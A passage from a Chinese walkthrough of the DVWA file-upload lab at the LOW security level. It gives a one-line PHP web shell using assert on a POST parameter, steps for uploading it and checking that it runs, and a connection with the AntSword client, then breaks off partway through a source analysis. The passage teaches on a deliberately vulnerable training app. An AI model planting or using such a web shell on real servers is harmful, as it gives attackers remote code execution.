目录
LOW
通关路径
1、新建个sh.php文件,内容如下:
<?php assert($_POST['dvwa']);?>
2、尝试直接上传,上传成功,给出了文件保存路径。
看来这关一点防御都没有,任意文件可上传。
3、用蚁剑连接之前可以先在浏览器中试一下文件在不在,能不能被当作php解析。
那一般如果404就是文件不存在,如果php代码以字符串显示了就是不能解析用户上传的php。这两种情况下也就不用搬出蚁剑了。
4、用蚁剑连接一句话木马
源码分析
果然是没有防御的,没有对上传的文件进行任何过滤。
三个主要操作:
(1)全局数组$_FILES用来获取通过 POST 方法上传文件的相关信息。详见PHP 文件上传
(2)bas